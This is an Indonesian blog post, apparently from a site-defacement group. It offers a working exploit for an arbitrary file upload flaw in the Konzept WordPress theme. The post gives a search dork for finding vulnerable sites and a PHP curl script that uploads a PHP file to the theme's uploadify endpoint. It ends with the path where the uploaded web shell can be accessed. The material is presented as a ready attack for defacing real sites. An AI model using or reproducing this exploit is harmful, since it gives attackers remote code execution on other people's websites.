Home Deface WordPress Theme Konzept Arbitrary File Upload Vulnerability

WordPress Theme Konzept Arbitrary File Upload Vulnerability

Dork: inurl:/wp-content/themes/konzept/

Exploit :

<?php $url = "http://127.0.0.1"; // put URL Here$post = array ( "file" => "@null_pointer.jpg", "name" => "null_pointer.php");$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch); echo $data;?>

Shell Akses : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/yours.php

Reviewed by Izza009 on 05.00 Rating: 5

Tidak ada komentar:

Langganan: Posting Komentar ( Atom )

WordPress Theme Konzept Arbitrary File Upload Vulnerability

Tidak ada komentar:

Label

Featured

Cara Install Telegram terbaru di Linux 2017

Mujahidin Cyber Army

Popular

Arsip Blog

Pengikut

Statistik Blog

WordPress Theme Konzept Arbitrary File Upload Vulnerability

Tidak ada komentar:

Social Widget

Label

Featured

Cara Install Telegram terbaru di Linux 2017

Mujahidin Cyber Army

Popular

Arsip Blog

Pengikut

Statistik Blog